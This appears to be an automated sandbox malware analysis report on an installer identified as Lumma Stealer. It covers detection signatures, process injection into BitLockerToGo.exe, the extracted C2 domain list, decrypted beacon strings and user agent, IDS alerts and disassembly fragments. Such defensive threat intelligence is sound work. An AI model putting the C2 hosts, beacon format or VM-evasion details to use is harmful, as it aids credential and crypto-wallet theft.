Edit tour

Windows Analysis Report
Installer_x64.exe

Overview

General Information

Sample name:	Installer_x64.exe
Analysis ID:	1584540
MD5:	9def2ab28d008fdcb73a0aa8e9e9d429
SHA1:	b8601f3d030e4c1f22eaeb30ea25648c1786b45e
SHA256:	c80d0ddd43303921c76ea1d153f8bb08c7c7f23a89b2e86cb38bf5cff18e0472
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Installer_x64.exe (PID: 6056 cmdline: "C:\Users\user\Desktop\Installer_x64.exe" MD5: 9DEF2AB28D008FDCB73A0AA8E9E9D429)

BitLockerToGo.exe (PID: 6204 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "tirepublicerj.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "impossiblekdo.click"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6204	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6204	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 6204	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:42:30.280375+0100	2028371	3	Unknown Traffic	192.168.2.5	49785	188.114.97.3	443	TCP
2025-01-05T19:42:31.684567+0100	2028371	3	Unknown Traffic	192.168.2.5	49795	188.114.97.3	443	TCP
2025-01-05T19:42:32.906016+0100	2028371	3	Unknown Traffic	192.168.2.5	49804	188.114.97.3	443	TCP
2025-01-05T19:42:34.063432+0100	2028371	3	Unknown Traffic	192.168.2.5	49812	188.114.97.3	443	TCP
2025-01-05T19:42:35.260057+0100	2028371	3	Unknown Traffic	192.168.2.5	49818	188.114.97.3	443	TCP
2025-01-05T19:42:37.026151+0100	2028371	3	Unknown Traffic	192.168.2.5	49831	188.114.97.3	443	TCP
2025-01-05T19:42:38.474068+0100	2028371	3	Unknown Traffic	192.168.2.5	49841	188.114.97.3	443	TCP
2025-01-05T19:42:41.744355+0100	2028371	3	Unknown Traffic	192.168.2.5	49862	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:42:31.188491+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49785	188.114.97.3	443	TCP
2025-01-05T19:42:32.175476+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49795	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:42:31.188491+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49785	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:42:32.175476+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49795	188.114.97.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:42:34.569869+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49812	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Installer_x64.exe

Avira: detected

Found malware configuration

Source: 0.2.Installer_x64.exe.bbf0000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "tirepublicerj.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "impossiblekdo.click"]}

Multi AV Scanner detection for submitted file

Source: Installer_x64.exe

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impossiblekdo.click
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2204016378.000000000BAAF000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LPnhqo--jqmircmzqpgf

Source: Installer_x64.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49841 version: TLS 1.2

Source: Installer_x64.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: Installer_x64.exe, 00000000.00000003.2278364976.000000000B894000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: Installer_x64.exe, 00000000.00000003.2278364976.000000000B894000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then jmp eax	0_3_0BCC0BD9
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ecx, eax	0_3_0BCA8B60
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000D5h]	0_3_0BCC3B70
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-000000BCh]	0_3_0BCA7A80
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_3_0BCADAA0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAFA53
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then push ebx	0_3_0BCBCA50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000ACh]	0_3_0BC95A69
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	0_3_0BCC0A6E
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov eax, edx	0_3_0BC889D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edx], al	0_3_0BC889D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_3_0BC869D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_3_0BC869D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-45A624E4h]	0_3_0BC9A958
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5DF56232h]	0_3_0BC9B913
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+09h]	0_3_0BC9B913
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	0_3_0BCA28A0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_0BCAA848
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov eax, edx	0_3_0BC88840
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edx], al	0_3_0BC88840
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	0_3_0BC9EFC0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-34B15C9Dh]	0_3_0BC9AF4C
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_3_0BCB8ED0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_3_0BC96EA6
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then test esi, esi	0_3_0BCBCE00
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov eax, ebx	0_3_0BC9CE10
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAFE2D
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [eax], dx	0_3_0BC94D92
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_3_0BC9ED50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_3_0BCBFD50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax-103C93E5h]	0_3_0BCC0CD2
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_3_0BC88C80
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+09h]	0_3_0BC9BC97
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov edx, ecx	0_3_0BCC2CB2
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_3_0BCAC390
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then lea eax, dword ptr [edi-75C93640h]	0_3_0BCAE390
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ecx, ebp	0_3_0BC883A0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	0_3_0BC82350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_0BCA2350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [edi], cx	0_3_0BCA2350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [edi], ax	0_3_0BCA2350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAF33A
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_3_0BC972F2
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAF293
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ebx, ecx	0_3_0BCAB218
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-60BDF915h]	0_3_0BC8A1E0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ecx, edx	0_3_0BC8A1E0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-34B15C9Dh]	0_3_0BC9B1E4
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_0BC98143
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	0_3_0BC99110
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAF13B
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+19h]	0_3_0BC9A79C
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ecx, eax	0_3_0BCAF7AC
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCAF7AC
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then jmp edx	0_3_0BCC27BA
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 77282253h	0_3_0BCBF640
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_3_0BCBF5D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ecx, eax	0_3_0BCB055A
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], al	0_3_0BCB055A
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_3_0BC88570
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then mov ebx, edx	0_3_0BC8C450
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-33h]	0_3_0BC9C470
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, edx	3_2_0040D050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_00409880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	3_2_004303AC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004303AC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000D5h]	3_2_00444770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-33h]	3_2_0041D070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000ACh]	3_2_004160CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax-103C93E5h]	3_2_004418D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042B0F2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+09h]	3_2_0041C897
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, ecx	3_2_0042C09E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041F950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	3_2_00440950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	3_2_0043115A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0043115A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00409170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	3_2_00443100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_00443100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004179D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_004401D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	3_2_00415996
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 77282253h	3_2_00440240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then test esi, esi	3_2_0043DA00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebx	3_2_0041DA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	3_2_00443220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_00443220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00430A2D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	3_2_00443239
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_00443239
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	3_2_0044323B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_0044323B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00439AD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-34B15C9Dh]	3_2_0041BB4C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	3_2_00443360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_00443360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	3_2_0041FBC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+19h]	3_2_0041B39C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, edx	3_2_00409440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], al	3_2_00409440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+09h]	3_2_0041C897
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_00443420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5DF56232h]	3_2_0041C430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+09h]	3_2_0041C430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042B430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	3_2_004434C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	3_2_004234A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00418D43
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-45A624E4h]	3_2_0041B558
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	3_2_00419D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042FD3B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_004075D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	3_2_004075D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-60BDF915h]	3_2_0040ADE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, edx	3_2_0040ADE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-34B15C9Dh]	3_2_0041BDE4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00430653
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push ebx	3_2_0043D650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ebp-14h], ecx	3_2_0044166E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_00417EE8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-000000BCh]	3_2_00428680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042FE93
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042E6A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	3_2_00402F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00422F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edi], cx	3_2_00422F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edi], ax	3_2_00422F50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	3_2_00429760
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042FF3A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	3_2_004417D9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042CF90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea eax, dword ptr [edi-75C93640h]	3_2_0042EF90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, ebp	3_2_00408FA0

Networking

Suricata IDS alerts for network traffic

